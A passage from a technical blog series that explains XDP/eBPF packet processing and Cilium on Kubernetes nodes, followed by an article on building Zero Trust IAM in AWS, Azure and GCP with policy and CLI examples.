        xdpdrv  id 44

lxc8a3f21b (index 7):
        tc ingress id 47
        tc egress  id 48

Reading the output:
– xdpdrv — XDP in native mode, running in the NIC driver before sk_buff (this is what you want)
– xdpgeneric instead of xdpdrv — generic mode, runs after sk_buff allocation, no performance benefit
– No XDP line at all — XDP not deployed; your CNI uses iptables for service forwarding

If you’re on EKS with aws-vpc-cni or GKE with kubenet, you likely won’t see XDP here — those CNIs use iptables. Understanding this section explains why teams migrating to Cilium see lower node CPU under the same traffic load.
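If you want to run this check across a fleet, the bpftool net list output is easy to parse. A sketch — the xdp_modes helper is hypothetical and assumes the output shape shown above:

```python
# Hypothetical helper: classify XDP attachment mode per interface
# from `bpftool net list` text (assumes the output format shown above).
sample = """\
eth0 (index 2):
        xdpdrv  id 44
lxc8a3f21b (index 7):
        tc ingress id 47
        tc egress  id 48
"""

def xdp_modes(output):
    modes, iface = {}, None
    for line in output.splitlines():
        if not line.startswith((" ", "\t")) and "(" in line:
            iface = line.split()[0]
            modes[iface] = None          # default: no XDP attached
        elif line.strip().startswith(("xdpdrv", "xdpgeneric", "xdpoffload")):
            modes[iface] = line.split()[0]
    return modes

print(xdp_modes(sample))  # {'eth0': 'xdpdrv', 'lxc8a3f21b': None}
```

Any interface mapped to None is a candidate for the "your CNI uses iptables here" case; xdpgeneric flags a node where XDP is loaded but delivering no performance benefit.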

Where XDP Sits in the Kernel Data Path

The standard Linux packet receive path:

NIC hardware
  ↓
DMA to ring buffer (kernel memory)
  ↓
[XDP hook — fires here, before sk_buff]
  ├── XDP_DROP   → discard, zero further allocation
  ├── XDP_PASS   → continue to kernel network stack
  ├── XDP_TX     → transmit back out the same interface
  └── XDP_REDIRECT → forward to another interface or CPU
  ↓
sk_buff allocated from slab allocator
  ↓
netfilter: PREROUTING
  ↓
IP routing decision
  ↓
netfilter: INPUT or FORWARD
  ↓  [iptables fires somewhere in here]
socket receive queue
  ↓
userspace application

XDP runs at the driver level, in the NAPI poll context — the same context where the driver is processing received packets off the ring buffer. The program runs before the kernel’s general networking code gets involved. There’s no sk_buff, no reference counting, no slab allocation.

NAPI (New API) is how modern Linux receives packets efficiently. Instead of one CPU interrupt per packet (catastrophically expensive at 1Mpps), the NIC fires a single interrupt, then the kernel polls the NIC ring buffer in batches until it’s drained. XDP runs inside this polling loop — as close to the hardware as software gets without running on the NIC itself.

At 1Mpps, the difference between XDP_DROP and an iptables DROP is roughly the cost of allocating and then immediately freeing 1 million sk_buff objects per second — plus netfilter traversal, connection tracking lookup, and the DROP action itself. That’s the CPU time that was burning.
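A back-of-envelope version of that comparison. The per-packet nanosecond costs below are assumed round numbers for illustration, not measurements from the incident:

```python
# Illustrative per-packet costs (assumed, not measured):
PPS = 1_000_000            # 1 Mpps flood
ns_skb_alloc_free = 70     # assumed slab alloc + free per packet
ns_netfilter = 120         # assumed hook traversal + conntrack lookup
ns_xdp_drop = 10           # assumed bounds check + XDP_DROP return
CORE_NS_PER_SEC = 1e9      # one CPU core-second in nanoseconds

iptables_pct = PPS * (ns_skb_alloc_free + ns_netfilter) / CORE_NS_PER_SEC * 100
xdp_pct = PPS * ns_xdp_drop / CORE_NS_PER_SEC * 100

print(f"iptables DROP path: ~{iptables_pct:.0f}% of one core")  # ~19%
print(f"XDP_DROP path:      ~{xdp_pct:.0f}% of one core")       # ~1%
```

The exact numbers vary by kernel and hardware; the point is that at 1 Mpps, every ~100 ns of pre-rule kernel work costs roughly a tenth of a core, which is the shape of the %si burn described above.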

After moving the blocklist to an XDP program, the %si on the same traffic load dropped from 28% to 3%.

XDP Modes

XDP operates in three modes, and which one you get depends on your NIC driver.

Native XDP (XDP_FLAGS_DRV_MODE)

The eBPF program runs directly in the NIC driver’s NAPI poll function — in softirq context, before sk_buff allocation. This is the only mode that delivers the full performance benefit.

Driver support is required. The widely supported drivers: mlx4, mlx5 (Mellanox/NVIDIA), i40e, ice (Intel), bnxt_en (Broadcom), virtio_net (KVM/QEMU), veth (containers). Check support:

# Verify native XDP support on your driver
ethtool -i eth0 | grep driver
# driver: mlx5_core  ← supports native XDP

# Load in native mode
ip link set dev eth0 xdpdrv obj blocklist.bpf.o sec xdp

The veth driver supporting native XDP is what makes XDP meaningful inside Kubernetes pods — each pod’s veth interface can run an XDP program at wire speed.

Generic XDP (XDP_FLAGS_SKB_MODE)

Fallback for drivers that don’t support native XDP. The program still runs, but it runs after sk_buff allocation, as a hook in the netif_receive_skb path. No performance benefit over early netfilter. sk_buff is still allocated and freed for every packet.

# Generic mode — development and testing only
ip link set dev eth0 xdpgeneric obj blocklist.bpf.o sec xdp

Use this for development on a laptop with a NIC that lacks native XDP support. Never benchmark with it and never use it in production expecting performance gains.

Offloaded XDP

Runs on the NIC’s own processing unit (SmartNIC). Zero CPU involvement — the XDP decision happens in NIC hardware. Supported by Netronome Agilio NICs. Rare in production, but the theoretical ceiling for XDP performance.

The XDP Context: What Your Program Can See

XDP programs receive one argument: struct xdp_md.

struct xdp_md {
    __u32 data;           // offset of first packet byte in the ring buffer page
    __u32 data_end;       // offset past the last byte
    __u32 data_meta;      // metadata area before data (XDP metadata for TC cooperation)
    __u32 ingress_ifindex;
    __u32 rx_queue_index;
};

data and data_end are used as follows:

void *data     = (void *)(long)ctx->data;
void *data_end = (void *)(long)ctx->data_end;

// Every pointer dereference must be bounds-checked first
struct ethhdr *eth = data;
if ((void *)(eth + 1) > data_end)
    return XDP_PASS;  // malformed or truncated packet

The verifier enforces these bounds checks — every pointer derived from ctx->data must be validated before use. The error invalid mem access 'inv' means you dereferenced a pointer without checking the bounds. This is the most common cause of XDP program rejection.
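The same discipline, sketched in userspace — a Python stand-in for the C bounds checks, where return strings and frame constants are illustrative:

```python
# Userspace sketch of the XDP bounds-check discipline on raw frame bytes.
import struct

ETH_HLEN = 14         # Ethernet header length
ETH_P_IP = 0x0800     # EtherType for IPv4

def classify(pkt: bytes) -> str:
    # mirror of: if ((void *)(eth + 1) > data_end) return XDP_PASS;
    if len(pkt) < ETH_HLEN:
        return "XDP_PASS"         # truncated frame: let the stack decide
    h_proto = struct.unpack_from("!H", pkt, 12)[0]
    if h_proto != ETH_P_IP:
        return "XDP_PASS"         # ARP, IPv6, VLAN, etc. — never drop blindly
    return "inspect-ip"           # now safe to read the IP header

print(classify(b"\x00" * 13))     # too short for an Ethernet header → XDP_PASS
```

The verifier enforces the C equivalent of the first check statically; the second check (passing non-IP traffic) is the guard that prevents the "ARP breaks" failure mode covered under Common Mistakes below.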

For operators (not writing XDP code): you’ll see invalid mem access 'inv' in logs when an eBPF program is rejected at load time — most commonly during a Cilium upgrade, or when deploying a custom tool on a kernel it wasn’t built for. The fix lives in the eBPF source or the tool version, not in cluster config: upgrade the tool or check its supported kernel matrix.

What XDP cannot see:
– Socket state — no socket buffer exists yet
– Cgroup hierarchy — no pod identity
– Process information — no PID, no container
– Connection tracking state (unless you maintain it yourself in a map)

XDP is ingress-only. It fires on packets arriving at an interface, not departing. For egress, TC is the hook.

What This Means on Your Cluster Right Now

Every Cilium-managed node has XDP programs running. Here’s how to see them:

# All XDP programs on all interfaces — this is the full picture
bpftool net list
# Sample output on a Cilium node:
#
# eth0 (index 2):
#         xdpdrv  id 44         ← XDP in native mode on the node uplink
#
# lxc8a3f21b (index 7):
#         tc ingress id 47      ← TC enforces NetworkPolicy on pod ingress
#         tc egress  id 48      ← TC enforces NetworkPolicy on pod egress
#
# "xdpdrv"     = native mode (runs in NIC driver, before sk_buff — full performance)
# "xdpgeneric" = fallback mode (after sk_buff — no performance benefit over iptables)

# Which mode is active?
ip link show eth0 | grep xdp
# xdp mode drv  ← native (full performance)
# xdp mode generic  ← fallback (no perf benefit)

# Details on the XDP program ID
bpftool prog show id $(bpftool net show dev eth0 | grep xdp | awk '{print $NF}')
# Shows: loaded_at, tag, xlated bytes, jited bytes, map IDs

The map IDs in that output are the BPF maps the XDP program is using — typically the service VIP table for DNAT, and in security tools, the blocklist or allowlist. To see what’s in them:

# List maps used by the XDP program
bpftool prog show id <PROG_ID> | grep map_ids

# Dump the service map (for a Cilium node — this is the load balancer table)
bpftool map dump id <MAP_ID> | head -40

For a blocklist scenario — like the SYN flood mitigation above — the BPF_MAP_TYPE_LPM_TRIE is the standard data structure. A lookup for 192.168.1.45 hits a 192.168.1.0/24 entry in the same map, handling both host /32s and CIDR ranges in one lookup. The practical operational check:

# Count entries in an XDP filter map
bpftool map dump id <BLOCKLIST_MAP_ID> | grep -c "key"

# Verify XDP is active and inspect program details
bpftool net show dev eth0
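The longest-prefix-match semantics are easy to model in userspace. A sketch using Python’s ipaddress module as a stand-in for the kernel trie — blocklist entries are illustrative:

```python
# Conceptual model of BPF_MAP_TYPE_LPM_TRIE lookups: most-specific prefix wins.
import ipaddress

blocklist = [ipaddress.ip_network(n) for n in ("203.0.113.7/32", "192.168.1.0/24")]

def lpm_lookup(ip: str):
    addr = ipaddress.ip_address(ip)
    matches = [n for n in blocklist if addr in n]
    # longest-prefix match: the most specific containing network wins
    return max(matches, key=lambda n: n.prefixlen, default=None)

print(lpm_lookup("192.168.1.45"))   # hits the 192.168.1.0/24 entry
print(lpm_lookup("8.8.8.8"))        # None → XDP_PASS
```

One structure, one lookup, handling /32 hosts and CIDR ranges together — which is exactly why the LPM trie is the standard map type for XDP blocklists.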

XDP Metadata: Cooperating with TC

Think of it as a sticky note attached to the packet. XDP writes the note at line speed (no context about pods or sockets). TC reads it later when full context is available, and acts on it. The packet carries the note between them.

More precisely: XDP can write metadata into the area before ctx->data — a small scratch space that survives as the packet moves from XDP to the TC hook. This is the coordination mechanism between the two eBPF layers.

The pattern is: XDP classifies at speed (no sk_buff overhead), TC enforces with pod context (where you have socket identity). XDP writes a classification tag into the metadata area. TC reads it and makes the policy decision.

This is the architecture behind tools like Pro-NDS: the fast-path pattern matching (connection tracking, signature matching) happens at XDP before any kernel allocation. The enforcement action — which requires knowing which pod sent this — happens at TC using the metadata XDP already wrote.
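A toy model of that handoff — the tag names, packet fields, and policy shapes are invented for illustration, not any tool’s actual wire format:

```python
# Toy model of the XDP→TC metadata handoff.
def xdp_classify(pkt):
    # fast path: raw-byte pattern match; no pod or socket context exists here
    tag = "suspicious" if pkt["src"].startswith("203.0.113.") else "clean"
    pkt["meta"] = tag                  # the "sticky note" in the pre-data area
    return pkt

def tc_enforce(pkt, pod_of):
    # slow path: sk_buff exists, destination pod identity is known
    pod = pod_of[pkt["dst"]]
    if pkt["meta"] == "suspicious" and pod["policy"] == "strict":
        return "DROP"
    return "ALLOW"

pods = {"10.0.1.5": {"policy": "strict"}}
pkt = xdp_classify({"src": "203.0.113.9", "dst": "10.0.1.5"})
print(tc_enforce(pkt, pods))           # DROP
```

The division of labor is the point: the expensive classification runs where packets are cheapest to touch, and the context-dependent decision runs where context exists.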

From an operational standpoint, when you see two eBPF programs on the same interface (one XDP, one TC), this pipeline is the likely explanation. The bpftool net list output shows both:

bpftool net list
# xdpdrv id 44 on eth0       ← XDP classifier running at line rate
# tc ingress id 47 on eth0   ← TC enforcer reading XDP metadata

How Cilium Uses XDP

Not running Cilium? On EKS with aws-vpc-cni or GKE with kubenet, service forwarding uses iptables NAT rules and conntrack instead. You can see this with iptables -t nat -L -n on a node — look for the KUBE-SVC-* chains. Those chains are what XDP replaces in a Cilium cluster. This is why teams migrating from kube-proxy to Cilium report lower node CPU at high connection rates — it’s not magic, it’s hook placement.

On a Cilium node, XDP handles the load balancing path for ClusterIP services. When a packet arrives at the node destined for a ClusterIP:

  1. XDP program checks the destination IP against a BPF LRU hash map of known service VIPs
  2. On a match, it performs DNAT — rewriting the destination IP to a backend pod IP
  3. Returns XDP_TX or XDP_REDIRECT to forward directly

No iptables NAT rules. No conntrack state machine. No socket buffer allocation for the routing decision. The lookup is O(1) in a BPF hash map.
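A rough sketch of that lookup-and-rewrite step — the VIP table contents and the flow-hash backend pick are illustrative, not Cilium’s actual map layout:

```python
# Toy model of the XDP service load-balancing step.
service_map = {                          # ClusterIP VIP → backend pod IPs
    "10.96.0.10": ["10.0.1.5", "10.0.2.9"],
}

def xdp_lb(dst_ip, flow_hash):
    backends = service_map.get(dst_ip)   # O(1) hash lookup, no conntrack
    if backends is None:
        return ("XDP_PASS", dst_ip)      # not a service VIP: normal stack path
    backend = backends[flow_hash % len(backends)]
    return ("XDP_TX", backend)           # DNAT to the backend, transmit directly

print(xdp_lb("10.96.0.10", flow_hash=7))   # ('XDP_TX', '10.0.2.9')
print(xdp_lb("8.8.8.8", flow_hash=7))      # ('XDP_PASS', '8.8.8.8')
```

Compare this with the KUBE-SVC-* chain traversal it replaces: the decision collapses from a linear rule walk plus conntrack state to one hash lookup and a header rewrite.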

# See Cilium's XDP program on the node uplink
ip link show eth0 | grep xdp
# xdp  (attached, native mode)

# The XDP program details
bpftool prog show pinned /sys/fs/bpf/cilium/xdp

# Load time, instruction count, JIT-compiled size
bpftool prog show id $(bpftool net list | grep xdp | awk '{print $NF}')

At production scale — 500+ nodes, 50k+ services — removing iptables from the service forwarding path with XDP reduces per-node CPU utilization measurably. The effect is most visible on nodes handling high connection rates to cluster services.

Operational Inspection

# All XDP programs on all interfaces
bpftool net list

# Check XDP mode (native, generic, offloaded)
ip link show | grep xdp

# Per-interface stats — includes XDP drop/pass counters
cat /sys/class/net/eth0/statistics/rx_dropped

# XDP drop counters exposed via bpftool
bpftool map dump id <stats_map_id>

# Verify XDP is active and show program details
bpftool net show dev eth0

Common Mistakes

| Mistake | Impact | Fix |
|---|---|---|
| Missing bounds check before pointer dereference | Verifier rejects: “invalid mem access” | Always check ptr + sizeof(*ptr) > data_end before use |
| Using generic XDP for performance testing | Misleading numbers — sk_buff still allocated | Test in native mode only; check ip link output for mode |
| Not handling non-IP traffic (ARP, IPv6, VLAN) | ARP breaks, IPv6 drops, VLAN-tagged frames dropped | Check eth->h_proto and return XDP_PASS for non-IP |
| Using XDP for egress or pod-identity policy | No socket context at XDP; XDP is ingress only | Use TC egress for pod-identity-aware egress policy |
| Forgetting BPF_F_NO_PREALLOC on an LPM trie | Map creation fails — the kernel requires this flag for LPM tries | Always set BPF_F_NO_PREALLOC when creating LPM trie maps |
| Blocking ARP by accident in a /24 blocklist | Loss of layer-2 reachability within the blocked subnet | Separate ARP handling before the IP blocklist check |

Key Takeaways

  • XDP fires before sk_buff allocation — the earliest possible kernel hook for packet processing
  • Three modes: native (in-driver, full performance), generic (fallback, no perf gain), offloaded (NIC ASIC)
  • XDP context is raw packet bytes — no socket, no cgroup, no pod identity; handle non-IP traffic explicitly
  • Every pointer dereference requires a bounds check against data_end — the verifier enforces this
  • BPF_MAP_TYPE_LPM_TRIE is the right map for IP prefix blocklists — handles /32 hosts and CIDRs together
  • XDP metadata area enables coordination with TC programs — classify at XDP speed, enforce with pod context at TC

What’s Next

XDP handles ingress at the fastest possible point but has no visibility into which pod sent a packet. EP08 covers TC eBPF — the hook that fires after sk_buff allocation, where socket and cgroup context exist.

TC is how Cilium implements pod-to-pod network policy without iptables. It’s also where stale programs from failed Cilium upgrades leave ghost filters that cause intermittent packet drops. Knowing how TC programs chain — and how to find and remove stale ones — is a specific, concrete operational skill.

Next: TC eBPF — pod-level network policy without iptables

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

Zero Trust Access in the Cloud: How the Evaluation Loop Actually Works

Reading Time: 10 minutes

Meta Description: Understand how zero trust access in the cloud works end to end — continuous verification, least privilege enforcement, and the full policy evaluation loop.




TL;DR

  • Zero Trust: trust nothing implicitly, verify everything explicitly, minimize blast radius by assuming you will be breached
  • Network location is not identity — VPN is authentication for the tunnel, not authorization for the resource
  • JIT privilege elevation removes standing admin access: engineers request elevation for a specific purpose, scoped to a specific duration
  • Device posture is an access signal — a compromised endpoint with valid credentials is still a threat; Conditional Access gates on device compliance
  • Continuous session validation re-evaluates signals throughout the session — device falls out of compliance, sessions revoke in minutes, not at expiry
  • The highest-ROI early moves: eliminate machine static credentials, enforce MFA on all human access, federate to a single IdP

The Big Picture

  ZERO TRUST IAM — EVERY REQUEST EVALUATED INDEPENDENTLY

  API call arrives
         │
         ▼
  Identity verified? ──── No ────► DENY
         │
        Yes
         │
         ▼
  Device compliant? ───── No ────► DENY (or step-up MFA)
         │
        Yes
         │
         ▼
  Policy allows this  ─── No ────► DENY
  action on this ARN?
         │
        Yes
         │
         ▼
  Conditions met? ─────── No ────► DENY
  (time, IP, MFA age,              (e.g., outside business hours,
   risk score, session)             impossible travel detected)
         │
        Yes
         │
         ▼
       ALLOW ──────────────────────► LOG every decision (allow and deny)
         │
         └── Continuous re-evaluation:
             device state changes → revoke
             anomaly detected → revoke or step-up
             credential age → require re-auth
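The loop above as a minimal sketch — signal names and the request shape are illustrative:

```python
# Every request evaluated independently; every decision logged, allow and deny.
audit = []

def log(principal, decision):
    audit.append((principal, decision))

def evaluate(req):
    checks = [
        ("identity_verified", req["identity_verified"]),
        ("device_compliant",  req["device_compliant"]),
        ("policy_allows",     req["policy_allows"]),
        ("conditions_met",    req["conditions_met"]),
    ]
    for name, ok in checks:
        if not ok:
            log(req["principal"], f"DENY:{name}")
            return "DENY"
    log(req["principal"], "ALLOW")
    return "ALLOW"

print(evaluate({"principal": "alice", "identity_verified": True,
                "device_compliant": False, "policy_allows": True,
                "conditions_met": True}))    # DENY
```

Two properties to notice: there is no short-circuit to ALLOW — every gate runs on every request — and the deny path records which signal failed, which is what makes the audit trail useful during an investigation.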

Introduction

The perimeter model of network security made a bet: inside the network is trusted, outside is not. Lock down the perimeter tightly enough and you’re safe. VPN in, and you’re one of us.

I grew up professionally in that model. Firewalls, DMZs, trusted zones. The idea had intuitive appeal — you build walls, you control what crosses them. For a while it worked reasonably well.

Then I watched it fail, repeatedly, in ways that were predictable in hindsight. An engineer’s laptop gets compromised at a coffee shop. They VPN in. Now the attacker is “inside.” A contractor account gets phished. They have valid Active Directory credentials. They’re inside. A cloud service gets misconfigured and exposes a management interface. There’s no perimeter for that to be inside of.

The perimeter model failed not because the walls weren’t strong enough, but because the premise was wrong. There is no inside. There is no perimeter that reliably separates trusted from untrusted. In a world of remote work, cloud services, contractor access, and API integrations, the attack surface doesn’t respect network boundaries.

Zero Trust is the architecture built on a different premise: trust nothing implicitly. Verify everything explicitly. Minimize blast radius by assuming you will be breached.

This isn’t a product you buy. It’s a set of principles applied to how you design, build, and operate your IAM. This episode is how those principles translate to concrete practices — building on everything we’ve covered in this series.


The Three Principles

Verify Explicitly

Every request must carry verifiable identity and context. Network location is not identity.

Old model: request from 10.0.0.0/8 → trusted, proceed
Zero Trust: request from 10.0.0.0/8 → still must present verifiable identity
                                       still must pass authorization check
                                       still must pass context evaluation
                                       then proceed (or deny)

In cloud IAM terms: every API call carries identity claims (IAM role ARN, federated identity, managed identity), and those claims are verified against policy on every single request. There is no concept of “once authenticated, trusted until logout” — the cloud provider APIs already implement this model natively. The real challenge is extending it to internal services, internal APIs, and human access patterns.

Implementation in practice:
– mTLS for service-to-service communication — both sides present certificates; identity is the certificate, not the network path
– Bearer tokens on every internal API call — no session cookies, no “we’re on the same VPC so it’s fine”
– Short-lived credentials everywhere — a compromised credential expires, not “after the session times out in 8 hours”

Use Least Privilege — Just-in-Time, Just-Enough

No standing access to sensitive resources. Access granted when needed, for the minimum scope, for the minimum duration.

Old model: alice is in the DBA group → permanent access to all databases
Zero Trust: alice requests access to production DB →
            verified: alice's device is enrolled in MDM and compliant
            verified: alice has an open change ticket for this task
            verified: current time is within business hours
            granted: connection to this specific database, from alice's specific IP
                     for 2 hours, then revoked automatically

This is JIT access. It reduces the window where a compromised credential can cause damage. It requires a change in how engineers think about access: access is not a property you have, it’s something you request when you need it. The operational friction is a feature, not a bug. Justifying each elevated access request is what keeps the access model honest.
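A toy version of that shift — access as a time-boxed grant record rather than a standing property. Function and field names are invented for illustration:

```python
# Toy JIT model: every grant carries a purpose (ticket) and an expiry.
from datetime import datetime, timedelta, timezone

grants = []

def request_elevation(user, resource, hours, ticket):
    grants.append({
        "user": user, "resource": resource, "ticket": ticket,
        "expires": datetime.now(timezone.utc) + timedelta(hours=hours),
    })

def has_access(user, resource, at=None):
    at = at or datetime.now(timezone.utc)
    return any(g["user"] == user and g["resource"] == resource
               and g["expires"] > at for g in grants)

request_elevation("alice", "prod-db", hours=2, ticket="CHG-1234")
print(has_access("alice", "prod-db"))    # True, inside the 2-hour window
```

Revocation is not an action anyone has to remember to take — it is the default state once the window closes, and the ticket field gives the audit trail its "why".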

Assume Breach

Design systems as if the attacker is already inside. This drives different decisions:

  • Micro-segmentation: one role per service, minimum permissions per role. If one service is compromised, it can’t pivot to everything else.
  • Log everything: every authorization decision, allow or deny. When you’re investigating an incident, you need to know what happened, not just that something happened.
  • Automate response: anomalous API call pattern → trigger automated credential revocation or session termination. Don’t wait for a human to notice.

Building Zero Trust IAM — Block by Block

Block 1: Strong Identity Foundation

You can’t verify explicitly without strong authentication. The starting point:

# AWS: require MFA for all IAM operations — enforce via SCP across the org
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "BoolIfExists": {
      "aws:MultiFactorAuthPresent": "false"
    },
    "StringNotLike": {
      "aws:PrincipalArn": [
        "arn:aws:iam::*:role/AWSServiceRole*",
        "arn:aws:iam::*:role/OrganizationAccountAccessRole"
      ]
    }
  }
}
# GCP: enforce OS Login for VM SSH (ties SSH access to Google identity, not SSH keys)
gcloud compute project-info add-metadata \
  --metadata enable-oslogin=TRUE

# This means: SSH to a VM requires your Google identity to have roles/compute.osLogin
# or roles/compute.osAdminLogin. No more managing ~/.authorized_keys files on instances.

For human access: hardware FIDO2 keys (YubiKey, Google Titan) rather than TOTP where possible. TOTP codes can be phished in real-time adversary-in-the-middle attacks. Hardware keys cannot — the cryptographic challenge-response is bound to the origin URL.
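A sketch of why origin binding defeats the relay. HMAC stands in for the device’s asymmetric signature here, and all names are illustrative — real WebAuthn signs over clientDataJSON, which embeds the origin:

```python
# Origin-bound challenge signing: a relayed assertion fails verification.
import hashlib
import hmac

def sign_assertion(key, challenge, origin):
    # stand-in for the authenticator signing (challenge, origin) together
    return hmac.new(key, challenge + origin.encode(), hashlib.sha256).hexdigest()

key = b"device-private-key-stand-in"
legit = sign_assertion(key, b"nonce1", "https://company.okta.com")
phish = sign_assertion(key, b"nonce1", "https://company-okta.com")  # AitM page

print(legit == phish)    # False — the phishing origin produces a different
                         # signature, so the real IdP rejects the relay
```

A TOTP code carries no origin at all, which is exactly why it relays cleanly through an adversary-in-the-middle proxy and a hardware-key assertion does not.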

Block 2: Device Posture as an Access Signal

In a Zero Trust model, the identity of the user is necessary but not sufficient. The state of the device matters too — a compromised endpoint with valid credentials is still a threat.

# Azure Conditional Access: block access from non-compliant devices
# (configured in the Entra ID Conditional Access portal — shown here as illustrative YAML)
conditions:
  clientAppTypes: [browser, mobileAppsAndDesktopClients]
  devices:
    deviceFilter:
      mode: exclude
      rule: "device.isCompliant -eq True and device.trustType -eq 'AzureAD'"
grantControls:
  builtInControls: [compliantDevice]
# AWS Verified Access: identity + device posture for application access — no VPN
aws ec2 create-verified-access-instance \
  --description "Zero Trust app access"

# Attach identity trust provider (Okta OIDC)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type user \
  --user-trust-provider-type oidc \
  --oidc-options IssuerURL=https://company.okta.com,ClientId=...,ClientSecret=...,Scope=openid

# Attach device trust provider (Jamf, Intune, or CrowdStrike)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type device \
  --device-trust-provider-type jamf \
  --device-options TenantId=JAMF_TENANT_ID

AWS Verified Access allows users to reach internal applications by verifying both their identity (via OIDC) and their device health (via MDM) — without a VPN. The access gateway evaluates both signals on every connection, not just at login.

Block 3: Just-in-Time Privilege Elevation

No standing elevated access. Engineers are eligible for elevated roles; they activate them when needed.

# Azure PIM: engineer activates an eligible privileged role
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant — incident ticket INC-2026-0411",
    "scheduleInfo": {
      "startDateTime": "2026-04-11T09:00:00Z",
      "expiration": {"type": "AfterDuration", "duration": "PT4H"}
    }
  }'
# Access activates, lasts 4 hours, then automatically removed
# AWS: temporary account assignment via Identity Center
# (typically triggered by ITSM workflow integration, not manual CLI)
aws sso-admin create-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

# Schedule deletion (using EventBridge + Lambda in a real deployment)
aws sso-admin delete-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

The operational change this requires: engineers stop thinking of access as something they hold permanently and start thinking of it as something they request for a specific purpose.

This feels like friction until you’re investigating an incident and you have a precise record of who activated what elevated access and why.

Block 4: Continuous Session Validation

Traditional auth: verify once at login, trust the session until timeout.
Zero Trust auth: re-evaluate access signals continuously throughout the session.

Session starts: identity verified + device compliant + IP in expected range
                → access granted

15 minutes later: impossible travel detected (IP changes to different country)
                  → step-up authentication required, or session terminated

Later: device compliance state changes (EDR detects malware)
       → all active sessions for this device revoked immediately

This requires integration between your identity platform and your device management / EDR tooling. Entra ID Conditional Access with Continuous Access Evaluation (CAE) implements this natively. When certain events occur — device compliance change, IP anomaly, token revocation — access tokens are invalidated within minutes rather than waiting for natural expiry.

// GCP: bind IAM access to an Access Context Manager access level
// Access level enforces device compliance — if device falls out of compliance,
// the access level is no longer satisfied and requests fail immediately
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.auth.access_levels.exists(x, x == 'accessPolicies/POLICY_NUM/accessLevels/corporate_compliant_device'),title=Compliant device required"
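The state machine behind continuous evaluation is simple to model. A toy sketch — device names, signal values, and session shapes are invented:

```python
# Toy continuous-evaluation model: a signal change revokes sessions mid-lifetime.
sessions = {"sess-1": {"device": "laptop-7", "active": True}}
device_state = {"laptop-7": "compliant"}

def on_signal(device, new_state):
    device_state[device] = new_state
    if new_state != "compliant":
        for s in sessions.values():
            if s["device"] == device:
                s["active"] = False   # revoke now, not at natural token expiry

on_signal("laptop-7", "malware-detected")
print(sessions["sess-1"]["active"])   # False
```

The hard part in production is not this logic — it is the plumbing: the EDR or MDM has to emit the signal, and the identity platform has to subscribe to it, which is what CAE and Access Context Manager provide.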

Block 5: Micro-Segmented Permissions

Every service has its own identity. Every identity has only what it needs. Compromise of one service cannot propagate to others.

# Terraform: IAM as code — each service gets a dedicated, scoped role
resource "aws_iam_role" "order_processor" {
  name                 = "svc-order-processor"
  permissions_boundary = aws_iam_policy.service_boundary.arn

  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
      Action    = "sts:AssumeRole"
    }]
  })
}

resource "aws_iam_role_policy" "order_processor" {
  name   = "order-processor-policy"
  role   = aws_iam_role.order_processor.id
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect   = "Allow"
        Action   = ["sqs:ReceiveMessage", "sqs:DeleteMessage", "sqs:GetQueueAttributes"]
        Resource = aws_sqs_queue.orders.arn
      },
      {
        Effect   = "Allow"
        Action   = ["dynamodb:PutItem", "dynamodb:GetItem", "dynamodb:UpdateItem"]
        Resource = aws_dynamodb_table.orders.arn
      }
    ]
  })
}
# Open Policy Agent: enforce IAM standards at the policy level
# Run this in CI/CD — fail the build if any policy statement has wildcard actions
package iam.policy

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Action == "*"
  msg := sprintf("Statement %d has wildcard Action — not allowed", [i])
}

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Resource == "*"
  endswith(input.Statement[i].Action, "Delete")
  msg := sprintf("Statement %d allows Delete on all resources — requires specific ARN", [i])
}
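If OPA isn’t in your stack, the same checks are easy to express as a plain-Python CI lint. This sketch mirrors the two Rego rules above; the policy shapes it accepts are assumptions:

```python
# Hypothetical CI lint mirroring the Rego rules: fail on wildcard statements.
def lint(policy):
    findings = []
    for i, stmt in enumerate(policy["Statement"]):
        if stmt["Effect"] != "Allow":
            continue
        action = stmt["Action"]
        actions = action if isinstance(action, list) else [action]
        if "*" in actions:
            findings.append(f"Statement {i} has wildcard Action")
        if stmt["Resource"] == "*" and any(a.endswith("Delete") for a in actions):
            findings.append(f"Statement {i} allows Delete on all resources")
    return findings

bad = {"Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
print(lint(bad))   # ['Statement 0 has wildcard Action']
```

Whichever engine you use, the structural point is the same: the check runs in CI against the policy document, so a wildcard never reaches an applied IAM role.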

Block 6: Universal Audit Trail

Zero Trust without logging is just obscurity. Every authorization decision — allow and deny — must be logged, retained, and queryable.

# AWS: verify CloudTrail is comprehensive
aws cloudtrail get-trail-status --name management-trail
# Must show IsLogging=true; confirm IsMultiRegionTrail and
# IncludeGlobalServiceEvents via: aws cloudtrail describe-trails

# Verify no management events are excluded
aws cloudtrail get-event-selectors --trail-name management-trail \
  | jq '.EventSelectors[] | {ReadWrite: .ReadWriteType, Mgmt: .IncludeManagementEvents}'
# ReadWriteType should be "All"; IncludeManagementEvents should be true

# GCP: ensure Data Access audit logs are enabled for IAM
gcloud projects get-iam-policy my-project --format=json | jq '.auditConfigs'
